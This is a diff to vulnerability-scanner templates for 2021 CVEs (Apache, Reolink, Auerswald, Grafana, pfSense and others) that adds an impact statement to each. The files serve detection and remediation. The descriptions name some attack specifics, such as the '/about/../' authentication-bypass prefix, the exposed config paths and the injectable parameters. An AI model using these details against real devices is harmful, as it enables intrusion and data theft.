@@ -6,6 +6,8 @@ info: severity: high description: | Reolink E1 Zoom camera through 3.0.0.716 is susceptible to information disclosure. The web server discloses its configuration via the /conf/ directory that is mapped to a publicly accessible path. An attacker with network-level access to the camera can can download the entire NGINX/FastCGI configurations by querying the /conf/nginx.conf or /conf/fastcgi.conf URI. + impact: | + An attacker can exploit this vulnerability to gain access to sensitive information, potentially compromising user privacy and security. remediation: | Upgrade the Reolink E1 Zoom Camera to a version higher than 3.0.0.716 to mitigate the information disclosure vulnerability (CVE-2021-40150). reference: diff --git a/http/cves/2021/CVE-2021-40323.yaml b/http/cves/2021/CVE-2021-40323.yaml index 44b20975e1..8105aa4a95 100644 --- a/http/cves/2021/CVE-2021-40323.yaml +++ b/http/cves/2021/CVE-2021-40323.yaml @@ -5,6 +5,8 @@ info: author: c-sh0 severity: critical description: Cobbler before 3.3.0 allows log poisoning and resultant remote code execution via an XMLRPC method. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized remote code execution, potentially resulting in complete compromise of the affected system. remediation: | Upgrade Cobbler to version 3.3.0 or later, which includes a fix for this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-40438.yaml b/http/cves/2021/CVE-2021-40438.yaml index 21a4437fce..b6f151b7fe 100644 --- a/http/cves/2021/CVE-2021-40438.yaml +++ b/http/cves/2021/CVE-2021-40438.yaml 
@@ -5,6 +5,8 @@ info: author: pdteam severity: critical description: Apache 2.4.48 and below contain an issue where uri-path can cause mod_proxy to forward the request to an origin server chosen by the remote user. + impact: | + Successful exploitation of this vulnerability could allow an attacker to bypass access controls and potentially access internal resources or perform further attacks. remediation: Upgrade to Apache version 2.4.49 or later. reference: - https://firzen.de/building-a-poc-for-cve-2021-40438 diff --git a/http/cves/2021/CVE-2021-40539.yaml b/http/cves/2021/CVE-2021-40539.yaml index 6fbe1c1a46..e25944303e 100644 --- a/http/cves/2021/CVE-2021-40539.yaml +++ b/http/cves/2021/CVE-2021-40539.yaml @@ -5,6 +5,8 @@ info: author: daffainfo,pdteam severity: critical description: Zoho ManageEngine ADSelfService Plus version 6113 and prior are vulnerable to a REST API authentication bypass vulnerability that can lead to remote code execution. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands with the privileges of the affected application. remediation: Upgrade to ADSelfService Plus build 6114. reference: - https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis diff --git a/http/cves/2021/CVE-2021-40542.yaml b/http/cves/2021/CVE-2021-40542.yaml index 93f761111e..5c432d463a 100644 --- a/http/cves/2021/CVE-2021-40542.yaml +++ b/http/cves/2021/CVE-2021-40542.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Opensis-Classic Version 8.0 is affected by cross-site scripting. An unauthenticated user can inject and execute JavaScript code through the link_url parameter in Ajax_url_encode.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | To mitigate this vulnerability, it is recommended to apply the latest security patches or updates provided by the vendor. reference: diff --git a/http/cves/2021/CVE-2021-40661.yaml b/http/cves/2021/CVE-2021-40661.yaml index c68c71da11..3dc8b9cf19 100644 --- a/http/cves/2021/CVE-2021-40661.yaml +++ b/http/cves/2021/CVE-2021-40661.yaml @@ -6,6 +6,8 @@ info: severity: high description: | IND780 Advanced Weighing Terminals Build 8.0.07 March 19, 2018 (SS Label 'IND780_8.0.07'), Version 7.2.10 June 18, 2012 (SS Label 'IND780_7.2.10') is vulnerable to unauthenticated local file inclusion. It is possible to traverse the folders of the affected host by providing a relative path to the 'webpage' parameter in AutoCE.ini. This could allow a remote attacker to access additional files on the affected system. + impact: | + An attacker can exploit this vulnerability to access sensitive information, such as configuration files or credentials, leading to further compromise of the system. remediation: | Apply the latest firmware update provided by the vendor to mitigate the vulnerability and ensure that the device is not accessible from untrusted networks. reference: diff --git a/http/cves/2021/CVE-2021-40822.yaml b/http/cves/2021/CVE-2021-40822.yaml index fb20d7197e..1eace67d08 100644 --- a/http/cves/2021/CVE-2021-40822.yaml +++ b/http/cves/2021/CVE-2021-40822.yaml 
@@ -5,6 +5,8 @@ info: author: For3stCo1d,aringo-bf severity: high description: GeoServer through 2.18.5 and 2.19.x through 2.19.2 allows server-side request forgery via the option for setting a proxy host. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to internal resources, data leakage, and potential remote code execution. remediation: | Apply the latest security patches or updates provided by the Geoserver project to mitigate the SSRF vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-40856.yaml b/http/cves/2021/CVE-2021-40856.yaml index e2d78fb159..e1a4454afd 100644 --- a/http/cves/2021/CVE-2021-40856.yaml +++ b/http/cves/2021/CVE-2021-40856.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: high description: Auerswald COMfortel 1400/2600/3600 IP is susceptible to an authentication bypass vulnerability. Inserting the prefix "/about/../" allows bypassing the authentication check for the web-based configuration management interface. This enables attackers to gain access to the login credentials used for authentication at the PBX, among other data. + impact: | + An attacker can bypass authentication and gain unauthorized access to the device. remediation: | Apply the latest firmware update provided by Auerswald to fix the authentication bypass vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-40859.yaml b/http/cves/2021/CVE-2021-40859.yaml index d93ce1b38c..8cad2a022f 100644 --- a/http/cves/2021/CVE-2021-40859.yaml +++ b/http/cves/2021/CVE-2021-40859.yaml 
@@ -5,6 +5,8 @@ info: author: pussycat0x severity: critical description: Auerswald COMpact 5500R 7.8A and 8.0B devices contain an unauthenticated endpoint ("https://192.168.1[.]2/about_state"), enabling the bad actor to gain backdoor access to a web interface that allows for resetting the administrator password. + impact: | + Unauthenticated attackers can gain unauthorized access to affected devices. remediation: | Apply the latest firmware update provided by Auerswald to fix the backdoor vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-40868.yaml b/http/cves/2021/CVE-2021-40868.yaml index 42ecdec156..cd14250637 100644 --- a/http/cves/2021/CVE-2021-40868.yaml +++ b/http/cves/2021/CVE-2021-40868.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: In Cloudron 6.2, the returnTo parameter on the login page is vulnerable to cross-site scripting. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions. remediation: Upgrade to Cloudron 6.3 or higher. reference: - https://packetstormsecurity.com/files/164255/Cloudron-6.2-Cross-Site-Scripting.html diff --git a/http/cves/2021/CVE-2021-40870.yaml b/http/cves/2021/CVE-2021-40870.yaml index 2d22faadcc..6dc29cabb5 100644 --- a/http/cves/2021/CVE-2021-40870.yaml +++ b/http/cves/2021/CVE-2021-40870.yaml 
@@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: Aviatrix Controller 6.x before 6.5-1804.1922 contains a vulnerability that allows unrestricted upload of a file with a dangerous type, which allows an unauthenticated user to execute arbitrary code via directory traversal. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system. remediation: | Upgrade Aviatrix Controller to version 6.5-1804.1922 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-40875.yaml b/http/cves/2021/CVE-2021-40875.yaml index bb753f3e66..e97361fb7f 100644 --- a/http/cves/2021/CVE-2021-40875.yaml +++ b/http/cves/2021/CVE-2021-40875.yaml @@ -5,6 +5,8 @@ info: author: oscarintherocks severity: high description: Improper access control in Gurock TestRail versions < 7.2.0.3014 resulted in sensitive information exposure. A threat actor can access the /files.md5 file on the client side of a Gurock TestRail application, disclosing a full list of application files and the corresponding file paths which can then be tested, and in some cases result in the disclosure of hardcoded credentials, API keys, or other sensitive data. + impact: | + An attacker could use the exposed files.md5 to gain insight into the application's file structure and potentially identify vulnerabilities or sensitive information. remediation: | Securely restrict access to the files.md5 file and ensure that it is not accessible to unauthorized users. reference: diff --git a/http/cves/2021/CVE-2021-40908.yaml b/http/cves/2021/CVE-2021-40908.yaml index ecfd51a15d..1184c7a1a0 100644 --- a/http/cves/2021/CVE-2021-40908.yaml +++ b/http/cves/2021/CVE-2021-40908.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | SQL injection vulnerability in Login.php in Sourcecodester Purchase Order Management System v1 by oretnom23, allows attackers to execute arbitrary SQL commands via the username parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Apply the latest patches or updates provided by the vendor to fix the SQL Injection vulnerability in the Purchase Order Management v1.0 application. reference: diff --git a/http/cves/2021/CVE-2021-40960.yaml b/http/cves/2021/CVE-2021-40960.yaml index 41afc07e10..cfb551f37a 100644 --- a/http/cves/2021/CVE-2021-40960.yaml +++ b/http/cves/2021/CVE-2021-40960.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: critical description: Galera WebTemplate 1.0 is affected by a directory traversal vulnerability that could reveal information from /etc/passwd and /etc/shadow. + impact: | + An attacker can read, modify, or delete sensitive files on the server, potentially leading to unauthorized access, data leakage, or system compromise. remediation: | Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in Galera WebTemplate 1.0. reference: diff --git a/http/cves/2021/CVE-2021-40968.yaml b/http/cves/2021/CVE-2021-40968.yaml index 41683eb901..14ee89a3bc 100644 --- a/http/cves/2021/CVE-2021-40968.yaml +++ b/http/cves/2021/CVE-2021-40968.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the newpassword2 parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions. remediation: Fixed in version 1.5.2 reference: - https://github.com/spotweb/spotweb/ diff --git a/http/cves/2021/CVE-2021-40969.yaml b/http/cves/2021/CVE-2021-40969.yaml index 3628085e9a..3e27e454a1 100644 --- a/http/cves/2021/CVE-2021-40969.yaml +++ b/http/cves/2021/CVE-2021-40969.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the firstname parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, potentially leading to session hijacking, data theft, or other attacks. remediation: Fixed in version 1.5.2 reference: - https://github.com/spotweb/spotweb/ diff --git a/http/cves/2021/CVE-2021-40970.yaml b/http/cves/2021/CVE-2021-40970.yaml index 77dd29a3b9..e7be7426e2 100644 --- a/http/cves/2021/CVE-2021-40970.yaml +++ b/http/cves/2021/CVE-2021-40970.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the username parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions. remediation: Fixed in version 1.5.2 reference: - https://github.com/spotweb/spotweb/ diff --git a/http/cves/2021/CVE-2021-40971.yaml b/http/cves/2021/CVE-2021-40971.yaml index 63bd9b481b..880a6ad81b 100644 --- a/http/cves/2021/CVE-2021-40971.yaml +++ b/http/cves/2021/CVE-2021-40971.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the newpassword1 parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: Fixed in version 1.5.2 reference: - https://github.com/spotweb/spotweb/ diff --git a/http/cves/2021/CVE-2021-40972.yaml b/http/cves/2021/CVE-2021-40972.yaml index 6a2086118c..452cebd422 100644 --- a/http/cves/2021/CVE-2021-40972.yaml +++ b/http/cves/2021/CVE-2021-40972.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the mail parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: Fixed in version 1.5.2 reference: - https://github.com/spotweb/spotweb/ diff --git a/http/cves/2021/CVE-2021-40973.yaml b/http/cves/2021/CVE-2021-40973.yaml index 9e0b955c9d..4d3a6a4432 100644 --- a/http/cves/2021/CVE-2021-40973.yaml +++ b/http/cves/2021/CVE-2021-40973.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the lastname parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Fixed in version 1.5.2 reference: - https://github.com/spotweb/spotweb/ diff --git a/http/cves/2021/CVE-2021-40978.yaml b/http/cves/2021/CVE-2021-40978.yaml index 77cf0aed79..96c64d4d38 100644 --- a/http/cves/2021/CVE-2021-40978.yaml +++ b/http/cves/2021/CVE-2021-40978.yaml 
@@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: The MKdocs 1.2.2 built-in dev-server allows directory traversal using the port 8000, enabling remote exploitation to obtain sensitive information. Note the vendor has disputed the vulnerability (see references) because the dev server must be used in an unsafe way (namely public) to have this vulnerability exploited. + impact: | + An attacker can read or modify sensitive files on the server, potentially leading to unauthorized access, data leakage, or system compromise. remediation: | Upgrade MKdocs to version 1.2.3 or later to fix the directory traversal vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-41174.yaml b/http/cves/2021/CVE-2021-41174.yaml index 7cacd46105..2fa9d84a14 100644 --- a/http/cves/2021/CVE-2021-41174.yaml +++ b/http/cves/2021/CVE-2021-41174.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: medium description: Grafana is an open-source platform for monitoring and observability. In affected versions if an attacker is able to convince a victim to visit a URL referencing a vulnerable page, arbitrary JavaScript content may be executed within the context of the victim's browser. The user visiting the malicious link must be unauthenticated and the link must be for a page that contains the login button in the menu bar. The url has to be crafted to exploit AngularJS rendering and contain the interpolation binding for AngularJS expressions. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the Grafana application. remediation: Upgrade to 8.2.3 or higher. reference: - https://github.com/grafana/grafana/security/advisories/GHSA-3j9m-hcv9-rpj8 diff --git a/http/cves/2021/CVE-2021-41192.yaml b/http/cves/2021/CVE-2021-41192.yaml index 8a76137bf6..67e1c55a37 100644 
--- a/http/cves/2021/CVE-2021-41192.yaml +++ b/http/cves/2021/CVE-2021-41192.yaml @@ -5,6 +5,8 @@ info: author: bananabr severity: medium description: Redash Setup Configuration is vulnerable to default secrets disclosure (Insecure Default Initialization of Resource). If an admin sets up Redash versions <=10.0 and prior without explicitly specifying the `REDASH_COOKIE_SECRET` or `REDASH_SECRET_KEY` environment variables, a default value is used for both that is the same across all installations. In such cases, the instance is vulnerable to attackers being able to forge sessions using the known default value. + impact: | + An attacker can gain unauthorized access to sensitive information and potentially compromise the Redash application. remediation: | Remove or update the default secrets in the Redash setup configuration file. reference: diff --git a/http/cves/2021/CVE-2021-41266.yaml b/http/cves/2021/CVE-2021-41266.yaml index 0c814aa2af..2167551438 100644 --- a/http/cves/2021/CVE-2021-41266.yaml +++ b/http/cves/2021/CVE-2021-41266.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | MinIO Console is a graphical user interface for the for MinIO Operator. MinIO itself is a multi-cloud object storage project. Affected versions are subject to an authentication bypass issue in the Operator Console when an external IDP is enabled. + impact: | + An attacker can bypass authentication and gain unauthorized access to the MinIO Operator Console. remediation: 'Update to v.0.12.3 or higher. Users unable to upgrade should add automountServiceAccountToken: false to the operator-console deployment in Kubernetes so no service account token will get mounted inside the pod, then disable the external identity provider authentication by unset the CONSOLE_IDP_URL, CONSOLE_IDP_CLIENT_ID, CONSOLE_IDP_SECRET and CONSOLE_IDP_CALLBACK environment variable and instead use the Kubernetes service account token.' reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-41266 
diff --git a/http/cves/2021/CVE-2021-41277.yaml b/http/cves/2021/CVE-2021-41277.yaml index 33f0ae7f1a..0f86f1072a 100644 --- a/http/cves/2021/CVE-2021-41277.yaml +++ b/http/cves/2021/CVE-2021-41277.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: Metabase is an open source data analytics platform. In affected versions a local file inclusion security issue has been discovered with the custom GeoJSON map (`admin->settings->maps->custom maps->add a map`) support and potential local file inclusion (including environment variables). URLs were not validated prior to being loaded. + impact: | + The vulnerability can result in unauthorized access to sensitive files or execution of arbitrary code on the affected system. remediation: This issue is fixed in 0.40.5 and .40.5 and higher. If you are unable to upgrade immediately, you can mitigate this by including rules in your reverse proxy or load balancer or WAF to provide a validation filter before the application. reference: - https://github.com/metabase/metabase/security/advisories/GHSA-w73v-6p7p-fpfr diff --git a/http/cves/2021/CVE-2021-41282.yaml b/http/cves/2021/CVE-2021-41282.yaml index 74ee536457..11248a4540 100644 --- a/http/cves/2021/CVE-2021-41282.yaml +++ b/http/cves/2021/CVE-2021-41282.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | diag_routes.php in pfSense 2.5.2 allows sed data injection. Authenticated users are intended to be able to view data about the routes set in the firewall. The data is retrieved by executing the netstat utility, and then its output is parsed via the sed utility. Although the common protection mechanisms against command injection (e.g., the usage of the escapeshellarg function for the arguments) are used, it is still possible to inject sed-specific code and write an arbitrary file in an arbitrary location. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized modification of critical system files, potentially resulting in a complete compromise of the pfSense firewall. remediation: | Upgrade to pfSense CE software version 2.6.0 or later, or pfSense Plus software version 22.01 or later. reference: diff --git a/http/cves/2021/CVE-2021-41291.yaml b/http/cves/2021/CVE-2021-41291.yaml index 447b11884e..6a67190970 100644 --- a/http/cves/2021/CVE-2021-41291.yaml +++ b/http/cves/2021/CVE-2021-41291.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: high description: The ECOA BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device + impact: | + An attacker can exploit this vulnerability to access sensitive files and directories, potentially exposing sensitive information. remediation: | Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in the ECOA Building Automation System. reference: diff --git a/http/cves/2021/CVE-2021-41349.yaml b/http/cves/2021/CVE-2021-41349.yaml index d193076532..a2793b89bb 100644 --- a/http/cves/2021/CVE-2021-41349.yaml +++ b/http/cves/2021/CVE-2021-41349.yaml 
@@ -5,6 +5,8 @@ info: author: rootxharsh,iamnoooob severity: medium description: Microsoft Exchange Server is vulnerable to a spoofing vulnerability. Be aware this CVE ID is unique from CVE-2021-42305. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, data theft, or other malicious activities. remediation: | Apply the latest security updates provided by Microsoft to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-41381.yaml b/http/cves/2021/CVE-2021-41381.yaml index f375519553..0ff0914bb1 100644 --- a/http/cves/2021/CVE-2021-41381.yaml +++ b/http/cves/2021/CVE-2021-41381.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: Payara Micro Community 5.2021.6 and below contains a directory traversal vulnerability. + impact: | + An attacker can access sensitive files on the server, potentially leading to unauthorized disclosure of sensitive information. remediation: | Upgrade to a patched version of Payara Micro Community or apply the necessary security patches to mitigate the directory traversal vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-41432.yaml b/http/cves/2021/CVE-2021-41432.yaml index 9cd1751387..5467530915 100644 --- a/http/cves/2021/CVE-2021-41432.yaml +++ b/http/cves/2021/CVE-2021-41432.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | FlatPress 1.2.1 contains a stored cross-site scripting vulnerability that allows for arbitrary execution of JavaScript commands through blog content. An attacker can possibly steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the application, leading to potential data theft, session hijacking, or defacement of the website. remediation: | Upgrade to the latest version of FlatPress (1.2.2) or apply the provided patch to fix the XSS vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-41460.yaml b/http/cves/2021/CVE-2021-41460.yaml index 8be3f53307..aaa8c6fadf 100644 --- a/http/cves/2021/CVE-2021-41460.yaml +++ b/http/cves/2021/CVE-2021-41460.yaml @@ -6,6 +6,8 @@ info: severity: high description: | ECShop 4.1.0 has SQL injection vulnerability, which can be exploited by attackers to obtain sensitive information. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage. remediation: | Apply the latest patch or upgrade to a newer version of ECShop to mitigate the SQL Injection vulnerability (CVE-2021-41460). reference: diff --git a/http/cves/2021/CVE-2021-41467.yaml b/http/cves/2021/CVE-2021-41467.yaml index 2da83eb852..c9effa282e 100644 --- a/http/cves/2021/CVE-2021-41467.yaml +++ b/http/cves/2021/CVE-2021-41467.yaml 
@@ -5,6 +5,8 @@ info: author: madrobot severity: medium description: A cross-site scripting vulnerability in application/controllers/dropbox.php in JustWriting 1.0.0 and below allow remote attackers to inject arbitrary web script or HTML via the challenge parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-41569.yaml b/http/cves/2021/CVE-2021-41569.yaml index b4f316a289..72305e790d 100644 --- a/http/cves/2021/CVE-2021-41569.yaml +++ b/http/cves/2021/CVE-2021-41569.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: SAS/Internet 9.4 build 1520 and earlier allows local file inclusion. The samples library (included by default) in the appstart.sas file, allows end-users of the application to access the sample.webcsf1.sas program, which contains user-controlled macro variables that are passed to the DS2CSF macro. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: | Apply the latest security patches or updates provided by SAS to fix the LFI vulnerability in the SAS/Internet 9.4 1520 application. reference: diff --git a/http/cves/2021/CVE-2021-41648.yaml b/http/cves/2021/CVE-2021-41648.yaml index 3835904f12..bea347b816 100644 --- a/http/cves/2021/CVE-2021-41648.yaml +++ b/http/cves/2021/CVE-2021-41648.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: An unauthenticated SQL injection vulnerability exists in PuneethReddyHC Online Shopping through the /action.php prId parameter. Using a post request does not sanitize the user input. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-41649.yaml b/http/cves/2021/CVE-2021-41649.yaml index bc51435845..f8060cdde0 100644 --- a/http/cves/2021/CVE-2021-41649.yaml +++ b/http/cves/2021/CVE-2021-41649.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: critical description: An unauthenticated SQL injection vulnerability exists in PuneethReddyHC Online Shopping System through the /homeaction.php cat_id parameter. Using a post request does not sanitize the user input. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-41653.yaml b/http/cves/2021/CVE-2021-41653.yaml index dc3744cfb3..28d9c41c5b 100644 --- a/http/cves/2021/CVE-2021-41653.yaml +++ b/http/cves/2021/CVE-2021-41653.yaml 
@@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: The PING function on the TP-Link TL-WR840N EU v5 router with firmware through TL-WR840N(EU)_V5_171211 is vulnerable to remote code execution via a specially crafted payload in an IP address input field. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire network. remediation: Upgrade the firmware to at least version "TL-WR840N(EU)_V5_211109". reference: - https://k4m1ll0.com/cve-2021-41653.html diff --git a/http/cves/2021/CVE-2021-41691.yaml b/http/cves/2021/CVE-2021-41691.yaml index 03e2cf0f62..a4d3875408 100644 --- a/http/cves/2021/CVE-2021-41691.yaml +++ b/http/cves/2021/CVE-2021-41691.yaml @@ -5,6 +5,8 @@ info: author: Bartu Utku SARP severity: high description: openSIS Student Information System version 8.0 is susceptible to SQL injection via the student_id and TRANSFER[SCHOOL] parameters in POST request sent to /TransferredOutModal.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage. remediation: | Apply the latest security patch or upgrade to a patched version of openSIS Student Information System to mitigate the SQL Injection vulnerability (CVE-2021-41691). reference: diff --git a/http/cves/2021/CVE-2021-41773.yaml b/http/cves/2021/CVE-2021-41773.yaml index 663b8071f4..c860b1fc03 100644 --- a/http/cves/2021/CVE-2021-41773.yaml +++ b/http/cves/2021/CVE-2021-41773.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and remote code execution. remediation: | Upgrade Apache to version 2.4.50 or apply the relevant patch provided by the vendor. reference: diff --git a/http/cves/2021/CVE-2021-41826.yaml b/http/cves/2021/CVE-2021-41826.yaml index e5c883f49a..4127bbe56d 100644 --- a/http/cves/2021/CVE-2021-41826.yaml +++ b/http/cves/2021/CVE-2021-41826.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: PlaceOS Authentication Service before 1.29.10.0 allows app/controllers/auth/sessions_controller.rb open redirect. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information. remediation: | Apply the latest security patch or update to PlaceOS 1.2109.2 or higher to fix the open redirection vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-41878.yaml b/http/cves/2021/CVE-2021-41878.yaml index 11c019b1ff..67559a9b6e 100644 --- a/http/cves/2021/CVE-2021-41878.yaml +++ b/http/cves/2021/CVE-2021-41878.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | i-Panel Administration System 2.0 contains a cross-site scripting vulnerability that enables an attacker to execute arbitrary JavaScript code in the browser-based web console. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-4191.yaml b/http/cves/2021/CVE-2021-4191.yaml index 3dd5b5aa58..8087d67f6b 100644 --- a/http/cves/2021/CVE-2021-4191.yaml +++ b/http/cves/2021/CVE-2021-4191.yaml @@ -5,6 +5,8 @@ info: author: zsusac severity: medium description: An unauthenticated remote attacker can leverage this vulnerability to collect registered GitLab usernames, names, and email addresses. + impact: | + An attacker can enumerate valid usernames, which can be used for further attacks such as brute-forcing passwords or launching targeted phishing campaigns. remediation: | Implement rate limiting or CAPTCHA on the GraphQL API to prevent user enumeration. reference: diff --git a/http/cves/2021/CVE-2021-41951.yaml b/http/cves/2021/CVE-2021-41951.yaml index 560c718c0c..815f89df16 100644 --- a/http/cves/2021/CVE-2021-41951.yaml +++ b/http/cves/2021/CVE-2021-41951.yaml 
@@ -5,6 +5,8 @@ info: author: coldfish severity: medium description: ResourceSpace before 9.6 rev 18290 is affected by a reflected cross-site scripting vulnerability in plugins/wordpress_sso/pages/index.php via the wordpress_user parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: diff --git a/http/cves/2021/CVE-2021-42013.yaml b/http/cves/2021/CVE-2021-42013.yaml index 4a578010b4..360dacae8a 100644 --- a/http/cves/2021/CVE-2021-42013.yaml +++ b/http/cves/2021/CVE-2021-42013.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49 and 2.4.50. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. In certain configurations, for instance if mod_cgi is enabled, this flaw can lead to remote code execution. This issue only affects Apache 2.4.49 and 2.4.50 and not earlier versions. Note - CVE-2021-42013 is due to an incomplete fix for the original vulnerability CVE-2021-41773. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code and gain unauthorized access to sensitive information. remediation: Upgrade to Apache HTTP Server 2.4.51 or later. reference: - https://httpd.apache.org/security/vulnerabilities_24.html 
